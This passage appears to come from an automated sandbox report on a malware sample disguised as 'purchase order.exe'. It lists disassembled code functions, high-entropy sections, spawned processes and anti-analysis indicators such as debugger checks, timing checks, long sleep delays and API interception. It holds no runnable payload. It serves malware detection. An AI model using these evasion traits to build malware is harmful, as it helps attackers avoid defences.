                Source: C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exe Code function: 6_2_037D5931 push edi; ret 6_2_037D593A
                Source: C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exe Code function: 6_2_037AC5CE push eax; ret 6_2_037AC5E7
                Source: C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exe Code function: 6_2_037AEC11 push 00000024h; iretd 6_2_037AEC1D
                Source: C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exe Code function: 6_2_037B24ED push ebx; retf 6_2_037B2492
                Source: C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exe Code function: 6_2_037B94C4 push ds; retf 6_2_037B94DD
                Source: C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exe Code function: 6_2_037B248F push ebx; retf 6_2_037B2492
                Source: C:\Windows\SysWOW64\cacls.exe Code function: 7_2_0351225F pushad ; ret 7_2_035127F9
                Source: C:\Windows\SysWOW64\cacls.exe Code function: 7_2_035127FA pushad ; ret 7_2_035127F9
                Source: C:\Windows\SysWOW64\cacls.exe Code function: 7_2_035409AD push ecx; mov dword ptr [esp], ecx 7_2_035409B6
                Source: C:\Windows\SysWOW64\cacls.exe Code function: 7_2_0351283D push eax; iretd 7_2_03512858
                Source: C:\Windows\SysWOW64\cacls.exe Code function: 7_2_02CDE7D3 push ds; retf 7_2_02CDE7EC
                Source: C:\Windows\SysWOW64\cacls.exe Code function: 7_2_02CE8844 push FFFFFF8Ah; ret 7_2_02CE8859
                Source: C:\Windows\SysWOW64\cacls.exe Code function: 7_2_02CFAC40 push edi; ret 7_2_02CFAC49
                Source: C:\Windows\SysWOW64\cacls.exe Code function: 7_2_02CD77FC push ebx; retf 7_2_02CD77A1
                Source: C:\Windows\SysWOW64\cacls.exe Code function: 7_2_02CD779E push ebx; retf 7_2_02CD77A1
                Source: C:\Windows\SysWOW64\cacls.exe Code function: 7_2_02CD18DD push eax; ret 7_2_02CD18F6
                Source: purchase order.exe Static PE information: section name: .text entropy: 7.809008568803863
                Source: 0.2.purchase order.exe.6e10000.4.raw.unpack, 0.2.purchase order.exe.3617788.0.raw.unpack (multiple .cs files) High entropy of concatenated method names
                Source: C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exe Process created: C:\Windows\SysWOW64\cacls.exe "C:\Windows\SysWOW64\cacls.exe"
                Source: C:\Users\user\Desktop\purchase order.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\cacls.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: Yara match File source: Process Memory Space: purchase order.exe PID: 7556, type: MEMORYSTR
                Source: C:\Windows\SysWOW64\cacls.exe API/Special instruction interceptor: Address: 7FFE2220D324
                Source: C:\Windows\SysWOW64\cacls.exe API/Special instruction interceptor: Address: 7FFE2220D7E4
                Source: C:\Windows\SysWOW64\cacls.exe API/Special instruction interceptor: Address: 7FFE2220D944
                Source: C:\Windows\SysWOW64\cacls.exe API/Special instruction interceptor: Address: 7FFE2220D504
                Source: C:\Windows\SysWOW64\cacls.exe API/Special instruction interceptor: Address: 7FFE2220D544
                Source: C:\Windows\SysWOW64\cacls.exe API/Special instruction interceptor: Address: 7FFE2220D1E4
                Source: C:\Windows\SysWOW64\cacls.exe API/Special instruction interceptor: Address: 7FFE22210154
                Source: C:\Windows\SysWOW64\cacls.exe API/Special instruction interceptor: Address: 7FFE2220DA44
                Source: C:\Users\user\Desktop\purchase order.exe Memory allocated: 22B0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\purchase order.exe Memory allocated: 2540000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\purchase order.exe Memory allocated: 7470000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\purchase order.exe Memory allocated: 6FE0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\purchase order.exe Memory allocated: 8470000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\purchase order.exe Memory allocated: 9470000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\purchase order.exe Code function: 3_2_015A096E rdtsc 3_2_015A096E
                Source: C:\Users\user\Desktop\purchase order.exe Thread delayed: delay time: 922337203685477
                Source: C:\Users\user\Desktop\purchase order.exe API coverage: 0.7 %
                Source: C:\Windows\SysWOW64\cacls.exe API coverage: 2.6 %
                Source: C:\Users\user\Desktop\purchase order.exe TID: 7576 Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\cacls.exe TID: 3448 Thread sleep count: 32 > 30
                Source: C:\Windows\SysWOW64\cacls.exe TID: 3448 Thread sleep time: -64000s >= -30000s
                Source: C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exe TID: 6096 Thread sleep time: -40000s >= -30000s
                Source: C:\Windows\SysWOW64\cacls.exe Last function: Thread delayed
                Source: C:\Windows\SysWOW64\cacls.exe Code function: 7_2_02CEC940 FindFirstFileW,FindNextFileW,FindClose,7_2_02CEC940
                Source: olMGHvjsNFhNU.exe, 00000008.00000002.3517935623.000000000114F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllo
                Source: cacls.exe, 00000007.00000002.3517170394.00000000030A0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000A.00000002.2664774336.0000025FE3FDC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Users\user\Desktop\purchase order.exe Process information queried: ProcessInformation
                Source: C:\Users\user\Desktop\purchase order.exe Process queried: DebugPort
                Source: C:\Windows\SysWOW64\cacls.exe Process queried: DebugPort
                Source: C:\Users\user\Desktop\purchase order.exe Code function: 3_2_00417E43 LdrLoadDll, 3_2_00417E43
                Source: C:\Users\user\Desktop\purchase order.exe Code function: 3_2_01566154 mov eax, dword ptr fs:[00000030h] 3_2_01566154
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01634500 mov eax, dword ptr fs:[00000030h]3_2_01634500
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0158E53E mov eax, dword ptr fs:[00000030h]3_2_0158E53E
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0158E53E mov eax, dword ptr fs:[00000030h]3_2_0158E53E
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0158E53E mov eax, dword ptr fs:[00000030h]3_2_0158E53E
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0158E53E mov eax, dword ptr fs:[00000030h]3_2_0158E53E
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0158E53E mov eax, dword ptr fs:[00000030h]3_2_0158E53E
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015665D0 mov eax, dword ptr fs:[00000030h]3_2_015665D0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0159A5D0 mov eax, dword ptr fs:[00000030h]3_2_0159A5D0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0159A5D0 mov eax, dword ptr fs:[00000030h]3_2_0159A5D0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0159E5CF mov eax, dword ptr fs:[00000030h]3_2_0159E5CF
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0159E5CF mov eax, dword ptr fs:[00000030h]3_2_0159E5CF
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0159C5ED mov eax, dword ptr fs:[00000030h]3_2_0159C5ED
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0159C5ED mov eax, dword ptr fs:[00000030h]3_2_0159C5ED
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015625E0 mov eax, dword ptr fs:[00000030h]3_2_015625E0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0158E5E7 mov eax, dword ptr fs:[00000030h]3_2_0158E5E7
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0158E5E7 mov eax, dword ptr fs:[00000030h]3_2_0158E5E7
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0158E5E7 mov eax, dword ptr fs:[00000030h]3_2_0158E5E7
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0158E5E7 mov eax, dword ptr fs:[00000030h]3_2_0158E5E7
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0158E5E7 mov eax, dword ptr fs:[00000030h]3_2_0158E5E7
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0158E5E7 mov eax, dword ptr fs:[00000030h]3_2_0158E5E7
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0158E5E7 mov eax, dword ptr fs:[00000030h]3_2_0158E5E7
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0158E5E7 mov eax, dword ptr fs:[00000030h]3_2_0158E5E7
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0159E59C mov eax, dword ptr fs:[00000030h]3_2_0159E59C
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01594588 mov eax, dword ptr fs:[00000030h]3_2_01594588
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01562582 mov eax, dword ptr fs:[00000030h]3_2_01562582
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01562582 mov ecx, dword ptr fs:[00000030h]3_2_01562582
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015845B1 mov eax, dword ptr fs:[00000030h]3_2_015845B1
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015845B1 mov eax, dword ptr fs:[00000030h]3_2_015845B1
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015E05A7 mov eax, dword ptr fs:[00000030h]3_2_015E05A7
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015E05A7 mov eax, dword ptr fs:[00000030h]3_2_015E05A7
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015E05A7 mov eax, dword ptr fs:[00000030h]3_2_015E05A7
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0158245A mov eax, dword ptr fs:[00000030h]3_2_0158245A
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0155645D mov eax, dword ptr fs:[00000030h]3_2_0155645D
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0159E443 mov eax, dword ptr fs:[00000030h]3_2_0159E443
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0159E443 mov eax, dword ptr fs:[00000030h]3_2_0159E443
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0159E443 mov eax, dword ptr fs:[00000030h]3_2_0159E443
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0159E443 mov eax, dword ptr fs:[00000030h]3_2_0159E443
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0159E443 mov eax, dword ptr fs:[00000030h]3_2_0159E443
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0159E443 mov eax, dword ptr fs:[00000030h]3_2_0159E443
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0159E443 mov eax, dword ptr fs:[00000030h]3_2_0159E443
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0159E443 mov eax, dword ptr fs:[00000030h]3_2_0159E443
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0158A470 mov eax, dword ptr fs:[00000030h]3_2_0158A470
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0158A470 mov eax, dword ptr fs:[00000030h]3_2_0158A470
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0158A470 mov eax, dword ptr fs:[00000030h]3_2_0158A470
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0161A456 mov eax, dword ptr fs:[00000030h]3_2_0161A456
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015EC460 mov ecx, dword ptr fs:[00000030h]3_2_015EC460
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01598402 mov eax, dword ptr fs:[00000030h]3_2_01598402
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01598402 mov eax, dword ptr fs:[00000030h]3_2_01598402
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01598402 mov eax, dword ptr fs:[00000030h]3_2_01598402
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0155C427 mov eax, dword ptr fs:[00000030h]3_2_0155C427
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0155E420 mov eax, dword ptr fs:[00000030h]3_2_0155E420
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0155E420 mov eax, dword ptr fs:[00000030h]3_2_0155E420
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0155E420 mov eax, dword ptr fs:[00000030h]3_2_0155E420
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015E6420 mov eax, dword ptr fs:[00000030h]3_2_015E6420
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015E6420 mov eax, dword ptr fs:[00000030h]3_2_015E6420
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015E6420 mov eax, dword ptr fs:[00000030h]3_2_015E6420
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015E6420 mov eax, dword ptr fs:[00000030h]3_2_015E6420
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015E6420 mov eax, dword ptr fs:[00000030h]3_2_015E6420
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015E6420 mov eax, dword ptr fs:[00000030h]3_2_015E6420
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015E6420 mov eax, dword ptr fs:[00000030h]3_2_015E6420
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015604E5 mov ecx, dword ptr fs:[00000030h]3_2_015604E5
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015944B0 mov ecx, dword ptr fs:[00000030h]3_2_015944B0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015EA4B0 mov eax, dword ptr fs:[00000030h]3_2_015EA4B0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0161A49A mov eax, dword ptr fs:[00000030h]3_2_0161A49A
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015664AB mov eax, dword ptr fs:[00000030h]3_2_015664AB
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015EE75D mov eax, dword ptr fs:[00000030h]3_2_015EE75D
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01560750 mov eax, dword ptr fs:[00000030h]3_2_01560750
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015A2750 mov eax, dword ptr fs:[00000030h]3_2_015A2750
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015A2750 mov eax, dword ptr fs:[00000030h]3_2_015A2750
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015E4755 mov eax, dword ptr fs:[00000030h]3_2_015E4755
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0159674D mov esi, dword ptr fs:[00000030h]3_2_0159674D
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0159674D mov eax, dword ptr fs:[00000030h]3_2_0159674D
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0159674D mov eax, dword ptr fs:[00000030h]3_2_0159674D
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01568770 mov eax, dword ptr fs:[00000030h]3_2_01568770
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01570770 mov eax, dword ptr fs:[00000030h]3_2_01570770
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01570770 mov eax, dword ptr fs:[00000030h]3_2_01570770
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01570770 mov eax, dword ptr fs:[00000030h]3_2_01570770
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01570770 mov eax, dword ptr fs:[00000030h]3_2_01570770
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01570770 mov eax, dword ptr fs:[00000030h]3_2_01570770
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01570770 mov eax, dword ptr fs:[00000030h]3_2_01570770
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01570770 mov eax, dword ptr fs:[00000030h]3_2_01570770
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01570770 mov eax, dword ptr fs:[00000030h]3_2_01570770
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01570770 mov eax, dword ptr fs:[00000030h]3_2_01570770
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01570770 mov eax, dword ptr fs:[00000030h]3_2_01570770
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01570770 mov eax, dword ptr fs:[00000030h]3_2_01570770
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01570770 mov eax, dword ptr fs:[00000030h]3_2_01570770
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01560710 mov eax, dword ptr fs:[00000030h]3_2_01560710
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01590710 mov eax, dword ptr fs:[00000030h]3_2_01590710
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0159C700 mov eax, dword ptr fs:[00000030h]3_2_0159C700
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0159273C mov eax, dword ptr fs:[00000030h]3_2_0159273C
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0159273C mov ecx, dword ptr fs:[00000030h]3_2_0159273C
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0159273C mov eax, dword ptr fs:[00000030h]3_2_0159273C
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015DC730 mov eax, dword ptr fs:[00000030h]3_2_015DC730
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0159C720 mov eax, dword ptr fs:[00000030h]3_2_0159C720
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0159C720 mov eax, dword ptr fs:[00000030h]3_2_0159C720
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0156C7C0 mov eax, dword ptr fs:[00000030h]3_2_0156C7C0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015E07C3 mov eax, dword ptr fs:[00000030h]3_2_015E07C3
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015647FB mov eax, dword ptr fs:[00000030h]3_2_015647FB
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015647FB mov eax, dword ptr fs:[00000030h]3_2_015647FB
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015827ED mov eax, dword ptr fs:[00000030h]3_2_015827ED
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015827ED mov eax, dword ptr fs:[00000030h]3_2_015827ED
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015827ED mov eax, dword ptr fs:[00000030h]3_2_015827ED
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015EE7E1 mov eax, dword ptr fs:[00000030h]3_2_015EE7E1
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_016147A0 mov eax, dword ptr fs:[00000030h]3_2_016147A0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0160678E mov eax, dword ptr fs:[00000030h]3_2_0160678E
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015607AF mov eax, dword ptr fs:[00000030h]3_2_015607AF
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0162866E mov eax, dword ptr fs:[00000030h]3_2_0162866E
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0162866E mov eax, dword ptr fs:[00000030h]3_2_0162866E
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0157C640 mov eax, dword ptr fs:[00000030h]3_2_0157C640
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01592674 mov eax, dword ptr fs:[00000030h]3_2_01592674
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0159A660 mov eax, dword ptr fs:[00000030h]3_2_0159A660
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0159A660 mov eax, dword ptr fs:[00000030h]3_2_0159A660
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015A2619 mov eax, dword ptr fs:[00000030h]3_2_015A2619
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015DE609 mov eax, dword ptr fs:[00000030h]3_2_015DE609
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0157260B mov eax, dword ptr fs:[00000030h]3_2_0157260B
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0157260B mov eax, dword ptr fs:[00000030h]3_2_0157260B
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0157260B mov eax, dword ptr fs:[00000030h]3_2_0157260B
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0157260B mov eax, dword ptr fs:[00000030h]3_2_0157260B
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0157260B mov eax, dword ptr fs:[00000030h]3_2_0157260B
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0157260B mov eax, dword ptr fs:[00000030h]3_2_0157260B
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0157260B mov eax, dword ptr fs:[00000030h]3_2_0157260B
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0157E627 mov eax, dword ptr fs:[00000030h]3_2_0157E627
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01596620 mov eax, dword ptr fs:[00000030h]3_2_01596620
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01598620 mov eax, dword ptr fs:[00000030h]3_2_01598620
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0156262C mov eax, dword ptr fs:[00000030h]3_2_0156262C
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0159A6C7 mov ebx, dword ptr fs:[00000030h]3_2_0159A6C7
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0159A6C7 mov eax, dword ptr fs:[00000030h]3_2_0159A6C7
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015E06F1 mov eax, dword ptr fs:[00000030h]3_2_015E06F1
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015E06F1 mov eax, dword ptr fs:[00000030h]3_2_015E06F1
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015DE6F2 mov eax, dword ptr fs:[00000030h]3_2_015DE6F2
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015DE6F2 mov eax, dword ptr fs:[00000030h]3_2_015DE6F2
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015DE6F2 mov eax, dword ptr fs:[00000030h]3_2_015DE6F2
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015DE6F2 mov eax, dword ptr fs:[00000030h]3_2_015DE6F2
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01564690 mov eax, dword ptr fs:[00000030h]3_2_01564690
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01564690 mov eax, dword ptr fs:[00000030h]3_2_01564690
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015966B0 mov eax, dword ptr fs:[00000030h]3_2_015966B0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0159C6A6 mov eax, dword ptr fs:[00000030h]3_2_0159C6A6
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015E0946 mov eax, dword ptr fs:[00000030h]3_2_015E0946
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01604978 mov eax, dword ptr fs:[00000030h]3_2_01604978
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01604978 mov eax, dword ptr fs:[00000030h]3_2_01604978
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015EC97C mov eax, dword ptr fs:[00000030h]3_2_015EC97C
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015A096E mov eax, dword ptr fs:[00000030h]3_2_015A096E
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015A096E mov edx, dword ptr fs:[00000030h]3_2_015A096E
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015A096E mov eax, dword ptr fs:[00000030h]3_2_015A096E
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01586962 mov eax, dword ptr fs:[00000030h]3_2_01586962
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01586962 mov eax, dword ptr fs:[00000030h]3_2_01586962
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01586962 mov eax, dword ptr fs:[00000030h]3_2_01586962
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015EC912 mov eax, dword ptr fs:[00000030h]3_2_015EC912
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01558918 mov eax, dword ptr fs:[00000030h]3_2_01558918
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01558918 mov eax, dword ptr fs:[00000030h]3_2_01558918
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015DE908 mov eax, dword ptr fs:[00000030h]3_2_015DE908
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015DE908 mov eax, dword ptr fs:[00000030h]3_2_015DE908
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015E892A mov eax, dword ptr fs:[00000030h]3_2_015E892A
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015F892B mov eax, dword ptr fs:[00000030h]3_2_015F892B
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0156A9D0 mov eax, dword ptr fs:[00000030h]3_2_0156A9D0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0156A9D0 mov eax, dword ptr fs:[00000030h]3_2_0156A9D0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0156A9D0 mov eax, dword ptr fs:[00000030h]3_2_0156A9D0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0156A9D0 mov eax, dword ptr fs:[00000030h]3_2_0156A9D0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0156A9D0 mov eax, dword ptr fs:[00000030h]3_2_0156A9D0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0156A9D0 mov eax, dword ptr fs:[00000030h]3_2_0156A9D0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015949D0 mov eax, dword ptr fs:[00000030h]3_2_015949D0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015F69C0 mov eax, dword ptr fs:[00000030h]3_2_015F69C0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015929F9 mov eax, dword ptr fs:[00000030h]3_2_015929F9
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015929F9 mov eax, dword ptr fs:[00000030h]3_2_015929F9
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0162A9D3 mov eax, dword ptr fs:[00000030h]3_2_0162A9D3
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015EE9E0 mov eax, dword ptr fs:[00000030h]3_2_015EE9E0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015E89B3 mov esi, dword ptr fs:[00000030h]3_2_015E89B3
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015E89B3 mov eax, dword ptr fs:[00000030h]3_2_015E89B3
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015E89B3 mov eax, dword ptr fs:[00000030h]3_2_015E89B3
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015729A0 mov eax, dword ptr fs:[00000030h]3_2_015729A0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015729A0 mov eax, dword ptr fs:[00000030h]3_2_015729A0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015729A0 mov eax, dword ptr fs:[00000030h]3_2_015729A0
